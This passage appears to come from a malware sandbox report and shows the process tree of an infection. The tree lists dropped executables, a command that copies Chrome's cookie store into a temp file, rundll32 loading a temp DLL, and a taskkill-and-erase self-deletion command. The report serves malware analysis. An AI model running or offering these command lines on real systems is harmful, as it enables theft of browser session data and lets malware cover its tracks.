                  cmd: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        C:\Windows\SysWOW64\cmd.exe (PID 2424)
          cmd: C:\Windows\system32\cmd.exe /c Thu11f106a00ed17759.exe
            C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11f106a00ed17759.exe (PID 1588)
              cmd: Thu11f106a00ed17759.exe
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
                C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11f106a00ed17759.exe (PID 3316)
                  cmd: C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11f106a00ed17759.exe
        C:\Windows\SysWOW64\cmd.exe (PID 1372)
          cmd: C:\Windows\system32\cmd.exe /c Thu11cf387a29397511.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11cf387a29397511.exe (PID 844)
  cmd: Thu11cf387a29397511.exe /mixtwo
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
    C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11cf387a29397511.exe (PID 3784)
      cmd: Thu11cf387a29397511.exe /mixtwo
      - Executes dropped EXE
        C:\Windows\SysWOW64\cmd.exe (PID 3208)
          cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im "Thu11cf387a29397511.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11cf387a29397511.exe" & exit
            C:\Windows\SysWOW64\taskkill.exe (PID 2452)
              cmd: taskkill /im "Thu11cf387a29397511.exe" /f
              - Kills process with taskkill

C:\Windows\system32\rundll32.exe (PID 4228)
  cmd: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
    C:\Windows\SysWOW64\rundll32.exe (PID 4256)
      cmd: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\system32\svchost.exe (PID 4396)
  cmd: C:\Windows\system32\svchost.exe -k SystemNetworkService